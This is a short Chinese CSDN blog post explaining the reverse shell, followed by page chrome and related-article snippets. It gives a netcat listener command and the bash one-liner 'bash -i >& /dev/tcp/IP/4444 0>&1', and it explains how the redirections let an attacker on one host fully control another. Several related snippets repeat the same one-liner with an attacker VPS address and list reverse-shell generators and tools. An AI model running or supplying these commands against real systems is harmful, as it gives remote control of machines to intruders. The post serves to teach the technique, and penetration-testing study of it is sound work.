反向 shell

最新推荐文章于 2024-06-15 11:43:50 发布
最新推荐文章于 2024-06-15 11:43:50 发布
阅读量637 收藏 1
点赞数
分类专栏: Linux 命令 linux shell
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/lyyslsw1230_163com/article/details/103728446
版权
linux 同时被 3 个专栏收录
33 篇文章 1 订阅
订阅专栏
Linux 命令
11 篇文章 0 订阅
订阅专栏
shell
7 篇文章 0 订阅
订阅专栏

nc -p 4444 -lvv

监听在4444端口, 监听模式, 显示命令执行过程, 假设本机IP地址10.100.125.15

 

bash -i >& /dev/tcp/10.100.125.15/4444 0>&1, 假设本机IP地址为10.100.125.14

 

bash -i : bash的交互模式

当>&后面接文件时,表示将标准输出和标准错误输出重定向至文件

当>&后面接文件描述符时,表示将前面的文件描述符重定向至后面的文件描述符

本例中/dev/tcp/10.100.125.15/4444 可以看做是一个文件。打开这个文件就相当于进行了一个socket调用,建立一个socket连接

那么 10.100.125.14上的执行bash的terminal 的标准输出和错误输出都会发送给10.100.125.15,那么黑客在15 上也就看到了14上的左右的操作了。

但是15不仅要知道14上的操作和结果,还要能控制14. 所以要对14的输入重定向到15, 也即0>&1.

 

这样在15上黑客就可以将命令发送给14, 14执行后的输出给15,,14就完全被控制了。

 

 

Johnblx
关注
  • 0
    点赞
  • 1
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
反弹shell bash -i命令
m0_37638874的博客
09-07 3822
这只是bash实现的用来实现网络请求的一个接口,其实就像我们自己编写的一个命令行程序,按照指定的格式输入host port参数,就能发起一个socket连接。复制格式有num1&num2,区别是,前者是以只读的形式打开,后者是以写的形式打开,这里两者均可。Linux系统中,把一切都看做是文件,当进程打开现有文件或创建新文件时,内核向进程返回一个文件描述符,,A先开启一个监听端口,让B去连接A的这个端口,连接成功后,A就能控制B了。是linux中的一个特殊设备,打开这个文件就相当于。
【学习笔记】反弹shell命令学习笔记,实战指南,1v1攻击测试教学,常用的反弹shell命令: bash -i >& /dev/tcp/vps的ip/vps的端口 0>&1
qq_37092496的博客
03-15 9012
文章目录 前言 为何给靶机发送这条执行命令就会自动连接到本地计算机,并且出发实时通讯机制(ps:有点类似oicq,前生就是用的这种模式开发的即时通讯) 作为渗透测试人员必备技能,反弹shell到底是什么原理,以及如何使用,本文是自己学习shell命令时的个人感悟和笔记,文章内容大量引入了较为官方的语言,给入门渗透学习的人员提供一个参考1 常用的反弹shell命令: bash -i >& /dev/tcp/vps的ip/vps的端口 0>&1 何为shell Shell 脚本(
高级黑客技术-5. 反向ShellShell
最新发布
jennycisp的博客
06-15 849
❝本指南提供了多种方法来建立反向Shell,包括使用加密和明文方式,适用于不同的场景和需求。通过这些技术,安全专家和合法授权的渗透测试者可以有效地控制远程系统,进行安全测试和漏洞评估。gs-netcat 提供加密的反向Shell,支持文件传输和管理员登录警报。Bash 和 cURL 方法允许通过简单的命令行工具建立连接。OpenSSL 和 remote.moe 提供了加密通道,增强了数据传输的安全性。
花一天时间搞懂反弹shell命令bash -i >& /dev/tcp/${HOST}/${PORT} 0>&1!
weixin_53306211的博客
10-28 1842
【代码】花一天时间搞懂反弹shell命令
20. Bash Shell - I/O 重定向
纽雪澳诺加海美德的博客
01-19 496
开篇词 结合 IO 重定向特性,我们可以方便地操纵文件或其他信息的输入输出。   标准输出 标准输出流通常被用来将一个程序的输出打印纸一个文件,它的文件描述符是 1。 输出文本至一个文件 echo 'This is a text for test' > fresh_file cat fresh_file 输出结果至一个文件 ll -a > dir_list_file ca...
反弹shell方法
Sea_Sand息禅
04-06 786
1、bash反弹shell kali ip:192.168.10.130 目标机上执行命令bash -i >& /dev/tcp/192.168.10.130/8888 0>&1 kali机执行命令:nc -lvp 8888 bash -i:在本地打开一个bash终端 linux文件描述符:linux shell下有三种标准的文件描述符,分别如下: 0...
反弹shell
ADDPPC的博客
11-26 573
反弹shell(reverse shell),就是控制端监听在某TCP/UDP端口,被控端发起请求到该端口,并将其命令行的输入输出转到控制端。reverse shell与telnet,ssh等标准shell对应,本质上是网络概念的客户端与服务端的角色反转。 为什么要反弹shell? 通常用于被控端因防火墙受限、权限不足、端口被占用等情形。 举例:假设我们攻击了一台机器,打开了该机器的一个端口,攻击者在自己的机器去连接目标机器(目标ip:目标机器端口),这是比较常规的形式,我们叫做正向连接。远程桌面、.
MIPS-Reverse:轻松生成MIPS反向shell shellcode!
04-16
MIPS-Reverse是一种可以为架构生成shellcode的工具,该工具将启动反向shell ,您可以在其中指定IP地址,端口和所需的shell ( / bin / sh , / bin / bash , / bin / dash )。 如何安装 # 1. Install pwntools $ ...
shp:Shell Please 1.0:反向shell代码生成器
03-03
Shell Please 1.0:反向Shell代码生成器 Shell Please是一种用于生成反向Shell代码的工具,它仅需几纳秒的时间。 每当执行渗透测试时,在使用RCE的情况下,我们始终需要反向Shell代码才能从目标系统获取反向Shell。...
reverse-shell-generator:基于Web的反向shell生成器
02-05
这个工具,正如其名,是一个基于Web的反向shell生成器,它能够帮助用户创建各种不同语言的反向shell代码片段。反向shell是一种允许攻击者从目标系统控制台获取命令行访问的技术,这在进行远程操作和权限提升时非常...
HTTP-Reverse-Shell:Python中的HTTP反向Shell
05-22
这是用Python编程的HTTP Reverse Shell。 它用于建立从客户端到服务器端的反向HTTP连接。 先决条件 Python 用法 在客户端上传输客户端程序 在服务器端传输服务器程序 运行服务器端程序以开始侦听 运行客户端程序 ...
linux-一个简单的脚本可自动生成OpenSSL反向shell
08-13
在这个场景中,我们讨论的是一个名为"Revssl"的脚本,它被设计用来自动生成OpenSSL反向shell反向shell是一种恶意攻击技术,通常用于攻击者控制受害者机器。在这种情况下,反向shell是指攻击者通过受害者的机器...
正向shell和反弹shell
weixin_45936149的博客
03-26 9526
正向shell反弹shell的利用场景以及使用技巧
黑客零基础第一章--反向shell
ShadowBlade
08-09 4917
一篇文章叫你完全掌握反向shell
反向shell实操
TingSty小z的博客
02-25 4753
实验一: A机器传递信息到B机器: 测试环境macOS 10.15 1、A用nc命令 listen本机一个端口号 nc -l 8000 2、B 用telnet命令 去连接A机器的ip和端口号 telnet ipA 8000 3、显示连接成功后,B机器可以输入文本,文本会传输到A机器上。实现B-》A的信息传输 telnet的退出 ctrl+] 实验二: 反向shell,A机器控制B机器 一种方式是ssh 登录到B机器上,这种属于正向Shell,A主动连接B,然后控制B; 另一种方式:方向shell,B
反弹shell汇总(超详细)
qq_52173020的博客
05-27 7628
反弹shell姿势大全,看这一篇就够啦~
[笔记]Windows安全之《一》反弹Shell
二次元怪兽的博客
04-01 1978
powershell反弹shell常见方式 文章目录正向连接和反向连接(反弹连接)PowerShell的配置常见的反弹Shell总结 正向连接和反向连接(反弹连接) PowerShell的配置 常见的反弹Shell 总结
反向连接的SHELL
digwtx的专栏
03-29 1167
#include #pragma comment(lib,"Ws2_32.lib")int WINAPI WinMain(){    WSADATA wsaData;    SOCKET hSocket;    STARTUPINFO si;    PROCESS_INFORMATION pi;    struct sockaddr_in adik_sin;    memset(&adik_sin
反向shell scapy
08-18
虽然 Scapy 本身没有直接提供反向 shell 的功能,但可以使用它来实现创建和发送网络数据包的自定义代码。 要创建一个反向 shell,你需要编写一些代码来构造一个恶意的网络数据包,并将其发送到目标计算机。这个...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值